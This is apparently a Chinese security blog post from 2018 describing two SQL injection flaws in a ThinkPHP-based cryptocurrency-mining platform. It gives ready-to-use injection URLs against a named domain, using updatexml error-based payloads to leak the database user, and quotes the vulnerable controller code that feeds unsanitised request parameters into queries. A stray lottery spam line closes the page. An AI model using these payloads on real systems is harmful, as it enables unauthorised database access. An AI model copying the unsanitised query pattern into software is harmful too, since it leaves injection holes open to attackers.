?

Nov 09 2018

某挖礦系統(各類幣)一些通用漏洞

首頁 » 原創作品 » 某挖礦系統(各類幣)一些通用漏洞   

某挖礦系統漏洞

網上很多挖礦系統都是由thinkphp框架開發,框架本身是沒什么漏洞的,但是到了開發的手上那就不一樣了,開發稍微不當,可能就會導致漏洞的產生。

前幾天發表了這篇文章,thinkphp一些版本的通殺漏洞payload 漏洞方面也是來源這里。

1.jpg


2.jpg



第一個漏洞


http://appbtc.com/index.php/index/shop/index?gid[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23



漏洞片段


public function index(){
   $items = M('goods');
   $gao = C('max_danjia');
   $rmb_hl = C('rmb_hl');
   $itemsdata = $items->find($_GET['gid']);
   $spjiage = sprintf("%.2f", $itemsdata['goldprice'] / $rmb_hl / $gao);
clipboard.png


4.png


第二個漏洞


//公告詳細頁
public function newsView(){
    //$data['truename']     = I('post.truename','','htmlspecialchars');
         // $id = I('id');
   $new = M('announce')->where(array('id'=>I('id')))->find();
   $this->assign('new',$new);
   $this->display();
}

 

http://appbtc.com/index.php/index/new/newsView?id[0]=exp&id[1]%20==1))%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23


55.jpg



不懂? 去研究一下 本博客的 有關thinkphp漏洞方面的文章。

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: 挖礦漏洞

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «BurpSuite_v2.0下載 | thinkphp一些版本的通殺漏洞payload»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖